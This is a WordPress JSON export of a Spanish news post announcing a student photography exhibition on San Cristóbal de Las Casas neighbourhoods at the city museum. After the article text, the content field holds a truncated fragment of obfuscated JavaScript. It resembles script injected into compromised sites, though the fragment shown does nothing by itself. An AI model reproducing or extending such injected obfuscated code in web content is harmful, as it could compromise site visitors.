{"id":10545,"date":"2023-06-14T00:38:29","date_gmt":"2023-06-14T00:38:29","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=10545"},"modified":"2023-06-14T00:38:30","modified_gmt":"2023-06-14T00:38:30","slug":"montan-exposicion-fotografica-de-barrios-de-san-cristobal","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=10545","title":{"rendered":"Montan exposici\u00f3n fotogr\u00e1fica de barrios de San Crist\u00f3bal"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/WhatsApp-Image-2023-06-13-at-3.23.18-PM-2-1024x576.jpeg\" alt=\"\" class=\"wp-image-10546\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/WhatsApp-Image-2023-06-13-at-3.23.18-PM-2-1024x576.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/WhatsApp-Image-2023-06-13-at-3.23.18-PM-2-300x169.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/WhatsApp-Image-2023-06-13-at-3.23.18-PM-2-768x432.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/WhatsApp-Image-2023-06-13-at-3.23.18-PM-2-1536x864.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/WhatsApp-Image-2023-06-13-at-3.23.18-PM-2.jpeg 1599w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p> \u00d3scar G\u00f3mez\/CorresponsalSan Crist\u00f3bal de Las Casas.- El Museo de San Crist\u00f3bal (Musac) cuyo director es Emilio G\u00f3mez Ozuna, y la Universidad Intercultural de Chiapas (UNICH), dieron a conocer que el pr\u00f3ximo jueves 15 de junio a las 12 del d\u00eda, ser\u00e1 inaugurada la exposici\u00f3n fotogr\u00e1fica con el tema \u201cSecuencia fotogr\u00e1fica de la comunidad de vinculaci\u00f3n\u201d, donde se abordan los barrios de Cuxtitali, El Cerrillo, La Merced, Santa Lucia y el andador de Santo Domingo. Las m\u00e1s de 70 fotograf\u00edas que se expondr\u00e1n, es el resultado de actividades que realizaron estudiantes del 2do Semestre de la carrera en Comunicaci\u00f3n Intercultural de la UNICH, durante el semestre que concluye, lo que busca promoverlo al mostrarse parte de las actividades de los barrios. Las actividades son coordinadas por el docente, Miguel \u00c1ngel Castellano P\u00e9rez, y donde se busca que a trav\u00e9s de la fotosecuencia sean un medio de comunicaci\u00f3n describiendo cada de los espacios que vinculaci\u00f3n, por citar el Barrio de La Merced, donde se da la relaci\u00f3n de las personas con el medio que lo rodea. Otra de las secuencias que se presentan, es el proceso del sacrificio del cochi del barrio de Cuxtitali, una de las actividades que distinguen a este lugar, uno de los m\u00e1s antiguos de esta ciudad. Esta exposici\u00f3n concluir\u00e1 el pr\u00f3ximo 29 de junio, en horarios de oficina en el MUSAC de martes a domingo.<\/p>\n\n\n\n<p><\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/CorresponsalSan Crist\u00f3bal de Las Casas.- El Museo de San Crist\u00f3bal (Musac) cuyo director es Emilio G\u00f3mez Ozuna, y la Universidad Intercultural de Chiapas (UNICH), dieron a conocer que el pr\u00f3ximo jueves 15 de junio a las 12 del d\u00eda, ser\u00e1 inaugurada la exposici\u00f3n fotogr\u00e1fica con el tema \u201cSecuencia fotogr\u00e1fica de la comunidad de vinculaci\u00f3n\u201d, &hellip;<\/p>\n","protected":false},"author":2,"featured_media":10546,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-10545","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10545","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=10545"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10545\/revisions"}],"predecessor-version":[{"id":10547,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10545\/revisions\/10547"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/10546"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=10545"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=10545"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=10545"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}